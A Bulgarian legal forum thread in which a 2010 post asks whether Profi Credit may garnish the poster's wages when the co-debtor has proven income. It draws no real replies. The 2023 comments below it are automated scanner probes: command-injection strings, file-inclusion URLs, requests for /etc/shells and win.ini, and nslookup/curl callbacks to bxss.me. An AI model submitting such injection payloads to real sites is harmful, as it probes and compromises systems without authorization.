Запор на заплата при доказани доходи

17.07.2010г. 08:43:17
Здравейте! Въпроса ми е има ли право Profi credit да наложи запор на заплатата ми (СД съм) при положение, че ГД работи и има доказани доходи?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:25
Http://bxss.me/t/fit.txt
lxbfYeaa
05.10.2023г. 07:25
echo yjcais$()\ onqhax\nz^xyu||a #' &echo yjcais$()\ onqhax\nz^xyu||a #|" &echo yjcais$()\ onqhax\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:25
http://bxss.me/t/fit.txt?.jpg
lxbfYeaa
05.10.2023г. 07:25
&echo ufuiue$()\ jdnbzl\nz^xyu||a #' &echo ufuiue$()\ jdnbzl\nz^xyu||a #|" &echo ufuiue$()\ jdnbzl\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:25
/etc/shells
lxbfYeaa
05.10.2023г. 07:25
|echo ddcfnz$()\ fqoaxm\nz^xyu||a #' |echo ddcfnz$()\ fqoaxm\nz^xyu||a #|" |echo ddcfnz$()\ fqoaxm\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:25
c:/windows/win.ini
lxbfYeaa
05.10.2023г. 07:25
(nslookup -q=cname hitntovoyqfgxde92c.bxss.me||curl hitntovoyqfgxde92c.bxss.me))
lxbfYeaa
05.10.2023г. 07:25
$(nslookup -q=cname hitgcjnnzlbbb4c10e.bxss.me||curl hitgcjnnzlbbb4c10e.bxss.me)
lxbfYeaa
05.10.2023г. 07:25
bxss.me

Коментар